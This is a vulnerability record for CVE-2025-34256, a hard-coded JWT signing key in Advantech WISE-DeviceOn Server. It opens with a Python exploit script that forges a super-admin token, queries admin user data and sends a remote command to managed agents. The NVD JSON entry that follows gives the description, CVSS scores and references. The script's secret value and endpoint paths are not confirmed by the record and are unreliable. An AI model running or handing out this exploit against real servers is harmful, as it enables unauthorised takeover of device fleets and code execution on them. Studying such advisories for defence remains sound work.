CVE-2025-34256

import jwt import requests # Hardcoded HS512 HMAC secret used by all Advantech WISE-DeviceOn Server installations JWT_SECRET = 'wise-deviceon-eirmmtoken-hs512-secret-key-2024' # Target DeviceOn Server URL TARGET_URL = 'https://target-deviceon-server.com' # Create forged JWT token with admin email claim payload = { 'email': '[email protected]', 'iat': 1733424000, 'exp': 1733510400 } # Sign the token using the hardcoded HS512 key forged_token = jwt.encode(payload, JWT_SECRET, algorithm='HS512') print(f'Forged JWT Token: {forged_token}') # Use the forged token to authenticate as admin headers = { 'Authorization': f'Bearer {forged_token}', 'Content-Type': 'application/json' } # Example: Access admin endpoints or execute commands on managed agents response = requests.get(f'{TARGET_URL}/api/admin/users', headers=headers) print(f'Status Code: {response.status_code}') print(f'Response: {response.text}') # Remote code execution on managed agents via DeviceOn API remote_exec_payload = { 'target_agent_id': 'agent-001', 'command': 'whoami', 'execute': True } exec_response = requests.post(f'{TARGET_URL}/api/agents/execute', headers=headers, json=remote_exec_payload) print(f'Remote Execution Response: {exec_response.text}')

{"cve": {"id": "CVE-2025-34256", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:55.053", "lastModified": "2026-04-15T19:16:32.673", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech WISE-DeviceOn Server versions prior to 5.4 contain a hard-coded cryptographic key vulnerability. The product uses a static HS512 HMAC secret for signing EIRMMToken JWTs across all installations. The server accepts forged JWTs that need only contain a valid email claim, allowing a remote unauthenticated attacker to generate arbitrary tokens and impersonate any DeviceOn account, including the root super admin. Successful exploitation permits full administrative control of the DeviceOn instance and can be leveraged to execute code on managed agents through DeviceOn’s remote management features."}, {"lang": "es", "value": "Advantech WISE-DeviceOn Server versiones anteriores a 5.4 tienen una vulnerabilidad de clave criptográfica almacenada en el código. El producto utiliza un secreto HMAC HS512 estático para firmar los JWT de EIRMMToken en todas las instalaciones. El servidor acepta JWT falsificados que solo necesitan contener un email claim válido, lo que permite a un atacante remoto no autenticado generar tokens arbitrarios y suplantar cualquier cuenta de DeviceOn, incluyendo la cuenta de superadministrador raíz. La explotación exitosa permite el control total como administrador de la instancia de DeviceOn y puede ser aprovechada para ejecutar código en agentes gestionados a través de las funciones de gestión remota de DeviceOn."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:wise-deviceon_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4", "matchCriteriaId": "BFB1F2C4-C260-473E-A6E1-EE7DFC3EF083"}]}]}], "references": [{"url": "https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf", "source": "[email protected]"}, {"url": "https://docs.deviceon.advantech.com/docs/resource/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://pellera.com/blog/advantech-wise-deviceon-cve-2025-34256-vulnerability/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-hardcoded-jwt-key-authentication-bypass", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}